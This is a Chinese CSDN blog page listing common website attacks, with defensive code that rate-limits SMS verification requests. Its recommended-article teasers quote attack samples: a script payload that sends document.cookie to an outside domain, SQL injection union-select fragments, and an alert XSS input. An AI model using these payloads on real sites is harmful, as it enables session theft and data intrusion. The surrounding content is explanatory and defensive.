网站被攻击常见的几种方式

最新推荐文章于 2022-07-29 14:51:26 发布
最新推荐文章于 2022-07-29 14:51:26 发布
阅读量397 收藏 1
点赞数
分类专栏: Java基础 JavaSript
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/baidu_29411925/article/details/52782280
版权

1. 越权访问 

2. 短信轰炸

前端

function sendVerifyCode(){
var mobile = $("#mobile").val();
$.ajax({
url : "${path}/app/user/sendVerifyCode",
method : "post",
data : {
mobile : mobile,
},
success : function(data) {
if(data && data.code){
if(data.code=="1"){
limited = 60;
timedCount();
$.dialog.info("验证码已发送");
$("#validate_verificationCode").text("");
} else {
$("#sendButton").attr("disabled",false);
if(data.value){
for(var i in data.value){
$("label#"+i).text(data.value[i]);
}
}else{
$.dialog.info(data.note);
}
}
}
}
});
}

function timedCount() {
var t;
if(limited == 0) {
$("#sendButton").val("获取短信验证码");
$("#sendButton").attr("disabled",false);
return ;
} else {
$("#sendButton").attr("disabled",true);
var buttonText = "获取短信验证码(" + limited-- + ")";
$("#sendButton").val(buttonText);
t=setTimeout("timedCount()",1000);
}
}

后台:

public void sendVerifyCode(){
Res res = new Res();
String mobile = getPara( "mobile" );

// 校验短信发送时间差
Object lastTime = getSessionAttr("msgValidateCode_time");
if(lastTime != null) {
long lastTimeL = Long.parseLong(lastTime.toString());
long currentTimeL = System.currentTimeMillis();
long timeDiff = currentTimeL - lastTimeL;
String interval = PropKit.get( "sms.interval_time" );
int intervalInt = 1;
try {
if( !StringUtil.isBlank(interval) ) {
intervalInt = Integer.parseInt(interval);
}
} catch (NumberFormatException e) {
}
if(timeDiff < 1000*60*intervalInt) {
res.setCode( OpResult.FAILED.getOrdinalStr() );
           res.setNote( "请勿频繁获取短信验证码" );
           renderJson( res );
           return;
}
}

// 获取短信验证码
String verifyCode = SmsUtil.generateCode();
// 调用第三方接口发送短信

setSessionAttr("msgValidateCode", verifyCode);
String time = System.currentTimeMillis()+"";
setSessionAttr("msgValidateCode_time", time);
setSessionAttr("verifiedMobile", mobile);
renderJson( res );
}

3. Sql注入

4. Xss攻击 

5. 上传文件携带shell脚本

028boboliu
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PHP常见的几种攻击方式实例小结
12-20
本文实例总结了PHP常见的几种攻击方式。分享给大家供大家参考,具体如下: 1.SQL Injection(sql注入) ①.暴字段长度 Order by num/* ②.匹配字段 and 1=1 union select 1,2,3,4,5…….n/* ③.暴露字段位置 and 1=2...
教你网站防CC攻击的几种方法
03-27
### 教你网站防CC攻击的几种方法 随着互联网技术的发展和网络攻击手段的多样化,CC攻击作为一种常见的分布式拒绝服务(DDoS)攻击形式,给众多网站和在线服务带来了巨大的威胁。CC攻击主要通过发送大量的HTTP请求来...
网站攻击了怎么处理 如何做好网站安全防护呢?
网站安全专家
03-18 699
2020年3月中旬,我们SINE安全收到客户的安全求助,说是网站攻击打不开了,随即对其进行了分析了导致网站攻击的通常情况下因素分外部攻击和内部攻击两类,外部网站攻击的因素,网站外部攻击通常情况下都是DDoS流量攻击。 DDoS攻击的手法通常情况下都是通过大批量模拟正常用户的手法去GET或POST请求占据网站服务器的大量的网络带宽资源,以实现堵塞瘫痪无法打开网站的目的,它的攻击方式通常情...
HTTP GET 攻击 及cc 及防护
weixin_30449453的博客
06-21 889
1、http get攻击:通过大量主机对受寒者发起http get请求 ,超过服务器处理能力; 当耗费的是服务器的cpu时,称为cc攻击;文末说明cc的特殊处 2、防范: 限制一下几种情况: 一、控制 单台主机对服务器的并发数量 二、控制 单台主机的连续重复信息 三、控制 单台主机的http get 速率 四、ht...
网站常用攻击技术详解
qq_55624813的博客
11-15 3925
一、跨站脚本攻击 概念 跨站脚本攻击(Cross-Site Scripting, XSS),可以将代码注入到用户浏览的网页上,这种代码包括 HTML 和JavaScript。 攻击原理 例如有一个论坛网站攻击者可以在上面发布以下内容: <script>location.href="//domain.com/?c=" + document.cookie</script> 之后该内容可能会被渲染成以下形式: <p><script>location.
服务器被恶意攻击可以报警吗?
m0_70754056的博客
07-29 7208
有很多朋友网站APP游戏等平台会遭遇恶意网络攻击,包括且不限于网页恶意篡改、扫描攻击、CC、DDOS、渗透注入等。遇到这些情况,可以向当地网警报案吗? 遭遇网络攻击,当然可以报警啦!像网页恶意篡改、扫描攻击、CC、DDOS都属于网络攻击行为了。 在法律中,和攻击入侵有关的主要是《刑法》第二百八十五和第二百八十六两条,以及相关司法解释。有无触犯这两项法条主要依据以下三点: 有没有越权控制系统; 有没有越权获得数据; 有没有破坏系统可用性。 网页恶意篡改很大情况下都表明系统已经被入侵了并被控制,且造
网站攻击常见的几种方式
weixin_43017996的博客
06-18 1万+
1、xss攻击:跨站脚本攻击,在网页中嵌入恶意脚本,盗取客户端cookie、用户名、密码等; 例:##原始表单 <input type="text" name="firstname" value=""/><script>alert("longlong")</script><!-- "/>##输入恶意脚本对输入做处理 页面会显示longlong的告警显示 2、csrf攻击:跨站请求伪造,一般是利用cookie 一般场景:1、User登录信任站点A,得到本地
常见网站攻击方式和防护方式
热门推荐
一名路过的小码农啊
09-19 1万+
第一种:DOS攻击  攻击描述: 通过协议方式,或抓住系统漏洞,集中对目标进行网络攻击,让目标计算机或网络无法提供正常的服务或资源访问,使目标系统服务系统停止响应甚至崩溃。例如疯狂Ping攻击,泪滴。 危害说明: 服务器资源耗尽,停止响应;技术门槛较低,效果明显。 处理方法: 1.扩展访问列表是防止DOS攻击的有效工具,例如Show IP access-list
网站防被cc攻击系统PHP源码
03-15
网站防被CC攻击系统是针对网络中常见的拒绝服务(Denial of Service, DoS)攻击类型——Challenge Collapsar(CC攻击)而设计的一种防护措施。CC攻击通过模拟大量合法用户请求,耗尽服务器资源,导致正常用户无法...
记录几种XSS绕过方式1
08-03
本文主要记录了几种XSS绕过的方法,帮助开发者理解攻击者可能使用的技巧,提高网站的安全性。 1. 服务端全局替换为空的特性: 当网站的过滤机制将某些特定字符如"onerror"或"script"替换为空时,攻击者可以利用...
短信防止验证码攻击方法
03-19
避免对外短信业务接口被刷的几种方案,前端通过设置图形验证码,后端通过加密通讯
分享常见的几种页面静态化的方法
01-20
PHP静态化的简单理解就是使网站生成页面以静态HTML的形式展现在访客面前,PHP静态化分纯静态化和伪静态化... 观看一下大一点的网站基本全是静态页面,而且可以减少攻击,防sql注入。 数据库出错时,不影响网站正常访问
几种网站攻击的解决办法
tomspcc的专栏
11-28 914
       网站攻击主要有,ARP欺骗攻击,CC攻击,DDOS流量攻击。          定义:          ARP攻击攻击,主要发生在同一机房或同一VLAN段服务器发起的攻击。          解决办法:通知机房处理可疑服务器          CC攻击,分为直接攻击,代理攻击,僵尸网络攻击,主要是由于攻击者对被攻击机器不断发起数据包,迫使服务器类似IIS连接数并发数超出负荷,服务...
网站攻击的三种手段及预防方法
青春微凉、不悲伤℃
12-23 5197
网站攻击,在当下屡见不鲜,并且目前的网络攻击模式各种各样,让人防不胜防。在这种情况下,知道一些常见网站攻击的方法就显得尤为重要了,这对于我们维护好网站,防范网站侵犯具有一定的积极作用。在这里,小编总结了3种常见网站攻击的方法及预防措施,供大家参考。        1、恶意攻击        恶意攻击通常有两种,一种是get方式,一种是post方式。        Get方式,俗称肉鸡攻
网站安全之几种常见的网络攻击方式
netuser1937的博客
12-19 8992
网站安全之几种常见的网络攻击方式
WEB网站常见攻击方式及解决办法
问道江湖
02-26 1057
      一个网站建立以后,如果不注意安全方面的问题,很容易被人攻击,下面就讨论一下几种漏洞情况和防止攻击的办法. 一.跨站脚本攻击(XSS)     跨站脚本攻击(XSS,Cross-site scripting)是最常见和基本的攻击WEB网站的方法。攻击者在网页上发布包含攻击性代码的数据。当浏览者看到此网页时,特定的脚本就会以浏览者用户的身份和权限来执行。通过XSS可以比较容易地修改...
TCP状态和常见攻击方式
lyq_csdn的博客
12-14 1万+
一.TCP状态 首先需要了解TCP中有哪些状态每个状态都有什仫意义?下面就来详细的介绍。。。 1).CLOSED:表示初始状态. 2).LISTEN:表示服务器端的某个SOCKET处于监听状态,可以接受连接。 3).SYN_RCVD:这个状态表示接受到了SYN报文,在正常情况下,这个状态是服务器端的SOCKET在建立TCP连接时的三次握手会话过程中的一个中间状态,很短暂,基本上
以json为body发送get请求
baidu_29411925的博客
09-27 6555
String url="http://61.161.211.134:9011/tsp/cherry?"; CloseableHttpClient httpclient = null; httpclient = HttpClients.createDefault(); JSONObject header = new JSONObject(); header.put("fv","0201");
哪些方式可以有效防护DDOS攻击
最新发布
06-08
以下是几种可以有效防护DDoS攻击方式: 1. 增加带宽:通过增加带宽来承载更多的流量,从而抵御DDoS攻击。 2. 使用负载均衡器:负载均衡器可以将流量分发到多个服务器上,从而分散攻击流量,减轻单个服务器的压力...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值